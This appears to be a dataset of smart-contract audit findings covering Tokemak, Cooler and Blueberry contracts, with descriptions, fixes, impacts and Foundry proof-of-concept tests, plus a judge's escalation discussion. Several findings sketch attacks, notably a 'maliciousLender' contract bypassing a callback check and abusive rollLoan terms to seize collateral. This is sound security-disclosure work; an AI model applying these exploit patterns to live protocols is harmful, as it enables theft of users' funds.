According to the solidity docs, if a `staticcall` encounters a state change, it burns up all gas and returns. The `checkReentrancy` tries to call `manageUserBalance` on the vault contract, and returns if it finds a state change.\\nThe issue is that this burns up all the gas sent with the call. According to EIP150, a call gets allocated 63/64 bits of the gas, and the entire 63/64 parts of the gas is burnt up after the staticcall, since the staticcall will always encounter a storage change. This is also highlighted in the balancer monorepo, which has guidelines on how to check re-entrancy here.\\nThis can also be shown with a simple POC.\\n```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n 
emit log_named_uint(\"Gas before price1\", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint(\"price1\", price1);\\n emit log_named_uint(\"Gas after price1 \", gasleft());\\n }\\n```\\n\\nThe oracle is called to get a price. This oracle calls the `checkReentrancy` function and burns up the gas. The gas left is checked before and after this call.\\nThe output shows this:\\n```\\n[PASS] testAttack() (gas: 9203730962297323943)\\nLogs:\\nGas before price1: 9223372036854745204\\nprice1: 1006294352158612428\\nGas after price1 : 425625349158468958\\n```\\n\\nThis shows that 96% of the gas sent is burnt up in the oracle call.чAccording to the monorepo here, the staticall must be allocated a fixed amount of gas. Change the reentrancy check to the following.\\n```\\n(, bytes memory revertData) = address(vault).staticcall{ gas: 10_000 }(\\n abi.encodeWithSelector(vault.manageUserBalance.selector, 0)\\n );\\n```\\n\\nThis ensures gas isn't burnt up without reason.чThis causes the contract to burn up 63/64 bits of gas in a single check. If there are lots of operations after this call, the call can revert due to running out of gas. This can lead to a DOS of the contract.\\nCurrent opinion is to reject escalation and keep issue medium severity.\\nJeffCX\\nPutting a limit on the gas is not a task for the protocol\\nsir, please read the report again, the flawed logic in the code charge user 100x gas in every transaction in every withdrawal\\nin a single transaction, the cost burnt can by minimal\\nidk how do state it more clearly, emm if you put money in the bank, you expect to pay 1 USD for withdrawal transaction fee, but every time you have to pay 100 USD withdrawal fee because of the bug\\nthis cause loss of fund for every user in every transaction for not only you but every user...\\nEvert0x\\n@JeffCX what are the exact numbers on the withdrawal costs? E.g. if I want to withdraw $10k, how much gas can I expect to pay? 
If this is a significant amount I can see the argument for\\nHow to identify a high issue: Definite loss of funds without limiting external conditions.\\nBut it's not clear how much this will be assuming current mainnet conditions.\\nJeffCX\\nI write a simpe POC\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"forge-std/console.sol\";\\n\\nimport \"@openzeppelin/contracts/token/ERC20/ERC20.sol\";\\n\\ncontract MockERC20 is ERC20 {\\n constructor()ERC20(\"MyToken\", \"MTK\")\\n {}\\n\\n function mint(address to, uint256 amount) public {\\n _mint(to, amount);\\n }\\n}\\n\\ninterface ICheckRetrancy {\\n function checkRentrancy() external;\\n}\\n\\ncontract RentrancyCheck {\\n\\n\\n uint256 state = 10;\\n\\n function checkRentrancy() external {\\n address(this).staticcall(abi.encodeWithSignature(\"hihi()\"));\\n }\\n\\n function hihi() public {\\n state = 11;\\n }\\n\\n}\\n\\ncontract Vault {\\n\\n address balancerAddr;\\n bool checkRentrancy;\\n\\n constructor(bool _checkRentrancy, address _balancerAddr) {\\n checkRentrancy = _checkRentrancy;\\n balancerAddr = _balancerAddr;\\n }\\n\\n function toggleCheck(bool _state) public {\\n checkRentrancy = _state;\\n }\\n\\n function withdraw(address token, uint256 amount) public {\\n\\n if(checkRentrancy) {\\n ICheckRetrancy(balancerAddr).checkRentrancy();\\n }\\n\\n IERC20(token).transfer(msg.sender, amount);\\n \\n }\\n\\n}\\n\\n\\ncontract CounterTest is Test {\\n\\n using stdStorage for StdStorage;\\n StdStorage stdlib;\\n\\n MockERC20 token;\\n Vault vault;\\n RentrancyCheck rentrancyCheck;\\n\\n address user = vm.addr(5201314);\\n\\n function setUp() public {\\n \\n token = new MockERC20();\\n rentrancyCheck = new RentrancyCheck();\\n vault = new Vault(false, address(rentrancyCheck));\\n token.mint(address(vault), 100000000 ether);\\n\\n vm.deal(user, 100 ether);\\n \\n // vault.toggleCheck(true);\\n\\n }\\n\\n function testPOC() public {\\n\\n 
uint256 gas = gasleft();\\n uint256 amount = 100 ether;\\n vault.withdraw(address(token), amount);\\n console.log(gas - gasleft());\\n\\n }\\n\\n}\\n```\\n\\nthe call is\\n```\\nif check reentrancy flag is true\\n\\nuser withdraw -> \\ncheck reentrancy staticall revert and consume most of the gas \\n-> withdraw completed\\n```\\n\\nor\\n```\\nif check reentrancy flag is false\\n\\nuser withdraw ->\\n-> withdraw completed\\n```\\n\\nnote first we do not check the reentrancy\\n```\\n// vault.toggleCheck(true);\\n```\\n\\nwe run\\nthe gas cost is 42335\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 45438)\\nLogs:\\n 42335\\n```\\n\\nthen we uncomment the vault.toggleCheck(true) and check the reentrancy that revert in staticcall\\n```\\nvault.toggleCheck(true);\\n```\\n\\nwe run the same test again, this is the output, as we can see the gas cost surge\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 9554791)\\nLogs:\\n 9551688\\n```\\n\\nthen we can use this python scirpt to estimate how much gas is overpaid as lost of fund\\n```\\nregular = 42313\\n\\noverpaid = 9551666\\n\\n\\ncost = 0.000000045 * (overpaid - regular);\\n\\nprint(cost)\\n```\\n\\nthe cost is\\n```\\n0.427920885 ETH\\n```\\n\\nin a single withdraw, assume user lost 0.427 ETH,\\nif 500 user withdraw 20 times each and the total number of transaction is 10000\\nthe lose on gas is 10000 * 0.427 ETH\\nJeffCX\\nnote that the more gas limit user set, the more fund user lose in gas\\nbut we are interested in what the lowest amount of gas limit user that user can set the pay for withdrawal transaction\\nI did some fuzzing\\nthat number is 1800000 unit of gas\\nthe command to run the test is\\nsetting gas limit lower than 1800000 unit of gas is likely to revert in out of gas\\nunder this setting, the overpaid transaction cost is 1730089\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 1733192)\\nLogs:\\n 
1730089\\n```\\n\\nin other words,\\nin each withdrawal for every user, user can lose 0.073 ETH, (1730089 uint of gas * 45 gwei -> 0.000000045 ETH)\\nassume there are 1000 user, each withdraw 10 times, they make 1000 * 10 = 100_00 transaction\\nso the total lost is 100_00 * 0.07 = 700 ETH\\nin reality the gas is more than that because user may use more than 1800000 unit of gas to finalize the withdrawal transaction\\nEvert0x\\n@JeffCX thanks for putting in the effort to make this estimation.\\nBut as far as I can see, your estimation doesn't use the actual contracts in scope. But maybe that's irrelevant to make your point.\\nThis seems like the key sentence\\nin each withdrawal for every user, user can lose 0.073 ETH,\\nThis is an extra $100-$150 dollars per withdrawal action.\\nThis is not a very significant amount in my opinion. I assume an optimized withdrawal transaction will cost between $20-$50. So the difference is not as big.\\nJeffCX\\nSir, I don't think the method A and method B example applies in the codebase and in this issue\\nthere is only one method for user to withdraw share from the vault\\nI can add more detail to explain how this impact withdraw using top-down approach\\nUser can withdraw by calling withdraw in LMPVault.sol and triggers _withdraw\\nthe _withdraw calls the method _calcUserWithdrawSharesToBurn\\nthis calls LMPDebt._calcUserWithdrawSharesToBurn\\nwe need to know the debt value by calling destVault.debtValue\\nthis calls this line of code\\nthis calls the oracle code\\n`uint256 price = _systemRegistry.rootPriceOracle().getPriceInEth(_underlying);`\\nthen if the dest vault is the balancer vault, balancer reetrancy check is triggered to waste 63 / 64 waste in oracle code\\nso there is no function A and function B call\\nas long as user can withdraw and wants to withdraw share from balancer vault, 100x gas overpayment is required\\nthe POC is a simplified flow of this\\nit is ok to disagree sir:)\\nEvert0x\\nResult: Medium Has 
Duplicates\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nJEFFCX: rejectedч```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint(\"Gas before price1\", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint(\"price1\", price1);\\n emit log_named_uint(\"Gas after price1 \", gasleft());\\n }\\n```\\n -Slashing during `LSTCalculatorBase.sol` deployment can show bad apr for monthsчmediumчThe contract `LSTCalculatorBase.sol` has some functions to calculate the rough APR expected from a liquid staking token. 
The contract is first deployed, and the first snapshot is taken after `APR_FILTER_INIT_INTERVAL_IN_SEC`, which is 9 days. It then calculates the APR between the deployment and this first snapshot, and uses that to initialize the APR value. It uses the function `calculateAnnualizedChangeMinZero` to do this calculation.\\nThe issue is that the function `calculateAnnualizedChangeMinZero` has a floor of 0. So if the backing of the LST decreases over that 9 days due to a slashing event in that interval, this function will return 0, and the initial APR and `baseApr` will be set to 0.\\nThe calculator is designed to update the APR at regular intervals of 3 days. However, the new apr is given a weight of 10% and the older apr is given a weight of 90% as seen below.\\n```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n\\nAnd alpha is hardcoded to 0.1. So if the initial APR starts at 0 due to a slashing event in the initial 9 day period, a large number of updates will be required to bring the APR up to the correct value.\\nAssuming the correct APR of 6%, and an initial APR of 0%, we can calculate that it takes up to 28 updates to reflect close to the correct APR. This translates to 84 days. So the wrong APR can be shown for up to 3 months. The protocol uses these APR values to justify the allocation to the various protocols. Thus a wrong APR for months would mean the protocol would suboptimally allocate funds for months, losing potential yield.чIt is recommended to initialize the APR with a specified value, rather than calculate it over the initial 9 days. 
9 day window is not good enough to get an accurate APR, and can be easily manipulated by a slashing event.чThe protocol can underperform for months due to slashing events messing up APR calculations close to deployment date.ч```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n -curve admin can drain pool via reentrancy (equal to execute emergency withdraw and rug tokenmak fund by third party)чmediumчA few curve liquidity is pool is well in-scope:\\n```\\nCurve Pools\\n\\nCurve stETH/ETH: 0x06325440D014e39736583c165C2963BA99fAf14E\\nCurve stETH/ETH ng: 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nCurve stETH/ETH concentrated: 0x828b154032950C8ff7CF8085D841723Db2696056\\nCurve stETH/frxETH: 0x4d9f9D15101EEC665F77210cB999639f760F831E\\nCurve rETH/ETH: 0x6c38cE8984a890F5e46e6dF6117C26b3F1EcfC9C\\nCurve rETH/wstETH: 0x447Ddd4960d9fdBF6af9a790560d0AF76795CB08\\nCurve rETH/frxETH: 0xbA6c373992AD8ec1f7520E5878E5540Eb36DeBf1\\nCurve cbETH/ETH: 0x5b6C539b224014A09B3388e51CaAA8e354c959C8\\nCurve cbETH/frxETH: 0x548E063CE6F3BaC31457E4f5b4e2345286274257\\nCurve frxETH/ETH: 0xf43211935C781D5ca1a41d2041F397B8A7366C7A\\nCurve swETH/frxETH: 0xe49AdDc2D1A131c6b8145F0EBa1C946B7198e0BA\\n```\\n\\none of the pool is 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nAdmin of curve pools can easily drain curve pools via reentrancy or via the `withdraw_admin_fees` function.\\n```\\n@external\\ndef withdraw_admin_fees():\\n receiver: address = Factory(self.factory).get_fee_receiver(self)\\n\\n amount: uint256 = self.admin_balances[0]\\n if amount != 0:\\n raw_call(receiver, b\"\", value=amount)\\n\\n amount = self.admin_balances[1]\\n if amount != 0:\\n assert ERC20(self.coins[1]).transfer(receiver, amount, default_return_value=True)\\n\\n self.admin_balances = empty(uint256[N_COINS])\\n```\\n\\nif admin of the curve can set a receiver to a malicious smart contract and reenter withdraw_admin_fees a 1000 times to drain the pool even the admin_balances is 
small\\nthe line of code\\n```\\nraw_call(receiver, b\"\", value=amount)\\n```\\n\\ntrigger the reentrancy\\nThis is a problem because as stated by the tokemak team:\\nIn case of external protocol integrations, are the risks of external contracts pausing or executing an emergency withdrawal acceptable? If not, Watsons will submit issues related to these situations that can harm your protocol's functionality.\\nPausing or emergency withdrawals are not acceptable for Tokemak.\\nAs you can see above, pausing or emergency withdrawals are not acceptable, and this is possible for cuve pools so this is a valid issue according to the protocol and according to the read meчN/Aчcurve admins can drain pool via reentrancyч```\\nCurve Pools\\n\\nCurve stETH/ETH: 0x06325440D014e39736583c165C2963BA99fAf14E\\nCurve stETH/ETH ng: 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nCurve stETH/ETH concentrated: 0x828b154032950C8ff7CF8085D841723Db2696056\\nCurve stETH/frxETH: 0x4d9f9D15101EEC665F77210cB999639f760F831E\\nCurve rETH/ETH: 0x6c38cE8984a890F5e46e6dF6117C26b3F1EcfC9C\\nCurve rETH/wstETH: 0x447Ddd4960d9fdBF6af9a790560d0AF76795CB08\\nCurve rETH/frxETH: 0xbA6c373992AD8ec1f7520E5878E5540Eb36DeBf1\\nCurve cbETH/ETH: 0x5b6C539b224014A09B3388e51CaAA8e354c959C8\\nCurve cbETH/frxETH: 0x548E063CE6F3BaC31457E4f5b4e2345286274257\\nCurve frxETH/ETH: 0xf43211935C781D5ca1a41d2041F397B8A7366C7A\\nCurve swETH/frxETH: 0xe49AdDc2D1A131c6b8145F0EBa1C946B7198e0BA\\n```\\n -At claimDefaulted, the lender may not receive the token because the Unclaimed token is not processedчhighч```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n\\nLoan data is deletead in `claimDefaulted` function. `loan.unclaimed` is not checked before data deletead. 
So, if `claimDefaulted` is called while there are unclaimed tokens, the lender will not be able to get the unclaimed tokens.чProcess unclaimed tokens before deleting loan data.\\n```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n// Add the line below\\n claimRepaid(loanID_)\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\nчLender cannot get unclaimed token.ч```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n -isCoolerCallback can be bypassedчhighчThe `CoolerCallback.isCoolerCallback()` is intended to ensure that the lender implements the `CoolerCallback` abstract at line 241 when the parameter `isCallback_` is `true`.\\n```\\nfunction clearRequest(\\n uint256 reqID_,\\n bool repayDirect_,\\n bool isCallback_\\n) external returns (uint256 loanID) {\\n Request memory req = requests[reqID_];\\n\\n // If necessary, ensure lender implements the CoolerCallback abstract.\\n if (isCallback_ && !CoolerCallback(msg.sender).isCoolerCallback()) revert NotCoolerCallback();\\n\\n // Ensure loan request is active. 
\\n if (!req.active) revert Deactivated();\\n\\n // Clear the loan request in memory.\\n req.active = false;\\n\\n // Calculate and store loan terms.\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n loanID = loans.length;\\n loans.push(\\n Loan({\\n request: req,\\n amount: req.amount + interest,\\n unclaimed: 0,\\n collateral: collat,\\n expiry: expiration,\\n lender: msg.sender,\\n repayDirect: repayDirect_,\\n callback: isCallback_\\n })\\n );\\n\\n // Clear the loan request storage.\\n requests[reqID_].active = false;\\n\\n // Transfer debt tokens to the owner of the request.\\n debt().safeTransferFrom(msg.sender, owner(), req.amount);\\n\\n // Log the event.\\n factory().newEvent(reqID_, CoolerFactory.Events.ClearRequest, 0);\\n}\\n```\\n\\nHowever, this function doesn't provide any protection. The lender can bypass this check without implementing the `CoolerCallback` abstract by calling the `Cooler.clearRequest()` function using a contract that implements the `isCoolerCallback()` function and returns a `true` value.\\nFor example:\\n```\\ncontract maliciousLender {\\n function isCoolerCallback() pure returns(bool) {\\n return true;\\n }\\n \\n function operation(\\n address _to,\\n uint256 reqID_\\n ) public {\\n Cooler(_to).clearRequest(reqID_, true, true);\\n }\\n \\n function onDefault(uint256 loanID_, uint256 debt, uint256 collateral) public {}\\n}\\n```\\n\\nBy being the `loan.lender` with implement only `onDefault()` function, this will cause the `repayLoan()` and `rollLoan()` methods to fail due to revert at `onRepay()` and `onRoll()` function. 
The borrower cannot repay and the loan will be defaulted.\\nAfter the loan default, the attacker can execute `claimDefault()` to claim the collateral.\\nFurthermore, there is another method that allows lenders to bypass the `CoolerCallback.isCoolerCallback()` function which is loan ownership transfer.\\n```\\n/// @notice Approve transfer of loan ownership rights to a new address.\\n/// @param to_ address to be approved.\\n/// @param loanID_ index of loan in loans[].\\nfunction approveTransfer(address to_, uint256 loanID_) external {\\n if (msg.sender != loans[loanID_].lender) revert OnlyApproved();\\n\\n // Update transfer approvals.\\n approvals[loanID_] = to_;\\n}\\n\\n/// @notice Execute loan ownership transfer. Must be previously approved by the lender.\\n/// @param loanID_ index of loan in loans[].\\nfunction transferOwnership(uint256 loanID_) external {\\n if (msg.sender != approvals[loanID_]) revert OnlyApproved();\\n\\n // Update the load lender.\\n loans[loanID_].lender = msg.sender;\\n // Clear transfer approvals.\\n approvals[loanID_] = address(0);\\n}\\n```\\n\\nNormally, the lender who implements the `CoolerCallback` abstract may call the `Cooler.clearRequest()` with the `_isCoolerCallback` parameter set to `true` to execute logic when a loan is repaid, rolled, or defaulted.\\nBut the lender needs to change the owner of the loan, so they call the `approveTransfer()` and `transferOwnership()` functions to the contract that doesn't implement the `CoolerCallback` abstract (or implement only `onDefault()` function to force the loan default), but the `loan.callback` flag is still set to `true`.\\nThus, this breaks the business logic since the three callback functions don't need to be implemented when the `isCoolerCallback()` is set to `true` according to the dev note in the `CoolerCallback` abstract below:\\n/// @notice Allows for debt issuers to execute logic when a loan is repaid, rolled, or defaulted. 
/// @dev The three callback functions must be implemented if `isCoolerCallback()` is set to true.чOnly allowing callbacks from the protocol-trusted address (eg., `Clearinghouse` contract).\\nDisable the transfer owner of the loan when the `loan.callback` is set to `true`.чThe lender forced the Loan become default to get the collateral token, owner lost the collateral token.\\nBypass the `isCoolerCallback` validation.ч```\\nfunction clearRequest(\\n uint256 reqID_,\\n bool repayDirect_,\\n bool isCallback_\\n) external returns (uint256 loanID) {\\n Request memory req = requests[reqID_];\\n\\n // If necessary, ensure lender implements the CoolerCallback abstract.\\n if (isCallback_ && !CoolerCallback(msg.sender).isCoolerCallback()) revert NotCoolerCallback();\\n\\n // Ensure loan request is active. \\n if (!req.active) revert Deactivated();\\n\\n // Clear the loan request in memory.\\n req.active = false;\\n\\n // Calculate and store loan terms.\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n loanID = loans.length;\\n loans.push(\\n Loan({\\n request: req,\\n amount: req.amount + interest,\\n unclaimed: 0,\\n collateral: collat,\\n expiry: expiration,\\n lender: msg.sender,\\n repayDirect: repayDirect_,\\n callback: isCallback_\\n })\\n );\\n\\n // Clear the loan request storage.\\n requests[reqID_].active = false;\\n\\n // Transfer debt tokens to the owner of the request.\\n debt().safeTransferFrom(msg.sender, owner(), req.amount);\\n\\n // Log the event.\\n factory().newEvent(reqID_, CoolerFactory.Events.ClearRequest, 0);\\n}\\n```\\n -`emergency_shutdown` role is not enough for emergency shutdown.чmediumчLet's examine the function emergencyShutdown():\\n```\\nfunction emergencyShutdown() external onlyRole(\"emergency_shutdown\") {\\n active = false;\\n\\n // If necessary, defund sDAI.\\n uint256 sdaiBalance = 
sdai.balanceOf(address(this));\\n if (sdaiBalance != 0) defund(sdai, sdaiBalance);\\n\\n // If necessary, defund DAI.\\n uint256 daiBalance = dai.balanceOf(address(this));\\n if (daiBalance != 0) defund(dai, daiBalance);\\n\\n emit Deactivated();\\n}\\n```\\n\\nThis has the modifier `onlyRole(\"emergency_shutdown\")`. However, this also calls function `defund()`, which has the modifier `onlyRole(\"cooler_overseer\")`\\n```\\nfunction defund(ERC20 token_, uint256 amount_) public onlyRole(\"cooler_overseer\") {\\n```\\n\\nTherefore, the role `emergency_shutdown` will not have the ability to shutdown the protocol, unless it also has the overseer role.\\nTo get a coded PoC, make the following modifications to the test case:\\n```\\n//rolesAdmin.grantRole(\"cooler_overseer\", overseer);\\nrolesAdmin.grantRole(\"emergency_shutdown\", overseer);\\n```\\n\\nRun the following test command (to just run a single test test_emergencyShutdown()):\\n```\\nforge test --match-test test_emergencyShutdown\\n```\\n\\nThe test will fail with the `ROLES_RequireRole()` error.чThere are two ways to mitigate this issue:\\nSeparate the logic for emergency shutdown and defunding. i.e. 
do not defund when emergency shutdown, but rather defund separately after shutdown.\\nMove the defunding logic to a separate internal function, so that emergency shutdown function can directly call defunding without going through a modifier.ч`emergency_shutdown` role cannot emergency shutdown the protocolч```\\nfunction emergencyShutdown() external onlyRole(\"emergency_shutdown\") {\\n active = false;\\n\\n // If necessary, defund sDAI.\\n uint256 sdaiBalance = sdai.balanceOf(address(this));\\n if (sdaiBalance != 0) defund(sdai, sdaiBalance);\\n\\n // If necessary, defund DAI.\\n uint256 daiBalance = dai.balanceOf(address(this));\\n if (daiBalance != 0) defund(dai, daiBalance);\\n\\n emit Deactivated();\\n}\\n```\\n -Lender is able to steal borrowers collateral by calling rollLoan with unfavourable terms on behalf of the borrower.чmediumчSay a user has 100 collateral tokens valued at $1,500 and they wish to borrow 1,000 debt tokens valued at $1,000 they would call: (values have been simplified for ease of math)\\n```\\nrequestLoan(\"1,000 debt tokens\", \"5% interest\", \"10 loan tokens for each collateral\", \"1 year\")\\n```\\n\\nIf a lender then clears the request the borrower would expect to have 1 year to payback 1,050 debt tokens to be able to receive their collateral back.\\nHowever a lender is able to call provideNewTermsForRoll with whatever terms they wish: i.e.\\n```\\nprovideNewTermsForRoll(\"loanID\", \"10000000% interest\", \"1000 loan tokens for each collateral\" , \"1 year\")\\n```\\n\\nThey can then follow this up with a call to rollLoan(loanID): During the rollLoan function the interest is recalculated using:\\n```\\n function interestFor(uint256 amount_, uint256 rate_, uint256 duration_) public pure returns (uint256) {\\n uint256 interest = (rate_ * duration_) / 365 days;\\n return (amount_ * interest) / DECIMALS_INTEREST;\\n }\\n```\\n\\nAs rate_ & duration_ are controllable by the lender when they call provideNewTermsForRoll they can input a
large number that the amount returned is much larger than the value of the collateral. i.e. input a rate_ of amount * 3 and duration of 365 days so that the interestFor returns 3,000.\\nThis amount gets added to the existing loan.amount and would make it too costly to ever repay as the borrower would have to spend more than the collateral is worth to get it back. i.e. borrower would now need to send 4,050 debt tokens to receive their $1,500 worth of collateral back instead of the expected 1050.\\nThe extra amount should result in more collateral needing to be sent however it is calculated using loan.request.loanToCollateral which is also controlled by the lender when they call provideNewTermsForRoll, allowing them to input a value that will result in newCollateralFor returning 0 and no new collateral needing to be sent.\\n```\\n function newCollateralFor(uint256 loanID_) public view returns (uint256) {\\n Loan memory loan = loans[loanID_];\\n // Accounts for all outstanding debt (borrowed amount + interest).\\n uint256 neededCollateral = collateralFor(loan.amount, loan.request.loanToCollateral); \\n // Lender can force neededCollateral to always be less than loan.collateral\\n\\n return neededCollateral > loan.collateral ? neededCollateral - loan.collateral : 0;\\n }\\n```\\n\\nAs a result a borrower who was expecting to have to repay 1050 tokens to get back their collateral may now need to spend many multiples more of that and will be forced to just forfeit their collateral to the lender.чAdd a check restricting rollLoan to only be callable by the owner.
i.e.:\\n```\\nfunction rollLoan(uint256 loanID_) external {\\n Loan memory loan = loans[loanID_];\\n \\n if (msg.sender != owner()) revert OnlyApproved();\\n```\\n\\nNote: unrelated but rollLoan is also missing its event should add:\\n```\\nfactory().newEvent(reqID_, CoolerFactory.Events.RollLoan, 0);\\n```\\nчBorrower will be forced to payback the loan at unfavourable terms or forfeit their collateral.ч```\\nrequestLoan(\"1,000 debt tokens\", \"5% interest\", \"10 loan tokens for each collateral\", \"1 year\")\\n```\\n -Stable BPT valuation is incorrect and can be exploited to cause protocol insolvencyчhighчStableBPTOracle.sol#L48-L53\\n```\\n uint256 minPrice = base.getPrice(tokens[0]);\\n for(uint256 i = 1; i != length; ++i) {\\n uint256 price = base.getPrice(tokens[i]);\\n minPrice = (price < minPrice) ? price : minPrice;\\n }\\n return minPrice.mulWadDown(pool.getRate());\\n```\\n\\nThe above block is used to calculate the price. Finding the min price of all assets in the pool then multiplying by the current rate of the pool. This is nearly identical to how stable curve LP is priced. Balancer pools are a bit different and this methodology is incorrect for them. Lets look at a current mainnet pool to see the problem. Take the wstETH/aETHc pool. Currently getRate() = 1.006. The lowest price is aETHc at 2,073.23. This values the LP at 2,085.66. The issue is that the LPs actual value is 1,870.67 (nearly 12% overvalued) which can be checked here.\\nOvervaluing the LP as such can cause protocol insolvency as the borrower can overborrow against the LP, leaving the protocol with bad debt.чStable BPT oracles need to use a new pricing methodologyчProtocol insolvency due to overborrowingч```\\n uint256 minPrice = base.getPrice(tokens[0]);\\n for(uint256 i = 1; i != length; ++i) {\\n uint256 price = base.getPrice(tokens[i]);\\n minPrice = (price < minPrice) ? 
price : minPrice;\\n }\\n return minPrice.mulWadDown(pool.getRate());\\n```\\n -CurveTricryptoOracle#getPrice contains math error that causes LP to be priced completely wrongчhighчCurveTricryptoOracle.sol#L57-L62\\n```\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n```\\n\\nAfter the LP price has been calculated in USD it is mistakenly divided by the price of ETH causing the contract to return the LP price in terms of ETH rather than USD. This leads to LP that is massively undervalued causing positions which are actually heavily over collateralized to be liquidated.чDon't divide the price by the price of ETHчHealthy positions are liquidated due to incorrect LP pricingч```\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n```\\n -CVX/AURA distribution calculation is incorrect and will lead to loss of rewards at the end of each cliffчhighчWAuraPools.sol#L233-L248\\n```\\n if (cliff < totalCliffs) {\\n /// e.g. (new) reduction = (500 - 100) * 2.5 + 700 = 1700;\\n /// e.g. (new) reduction = (500 - 250) * 2.5 + 700 = 1325;\\n /// e.g. (new) reduction = (500 - 400) * 2.5 + 700 = 950;\\n uint256 reduction = ((totalCliffs - cliff) * 5) / 2 + 700;\\n /// e.g. (new) amount = 1e19 * 1700 / 500 = 34e18;\\n /// e.g. (new) amount = 1e19 * 1325 / 500 = 26.5e18;\\n /// e.g. (new) amount = 1e19 * 950 / 500 = 19e17;\\n mintAmount = (mintRequestAmount * reduction) / totalCliffs;\\n\\n /// e.g. amtTillMax = 5e25 - 1e25 = 4e25\\n uint256 amtTillMax = emissionMaxSupply - emissionsMinted;\\n if (mintAmount > amtTillMax) {\\n mintAmount = amtTillMax;\\n }\\n }\\n```\\n\\nThe above code is used to calculate the amount of AURA owed to the user. This calculation is perfectly accurate if the AURA hasn't been minted yet. The problem is that each time a user withdraws, AURA is claimed for ALL vault participants. 
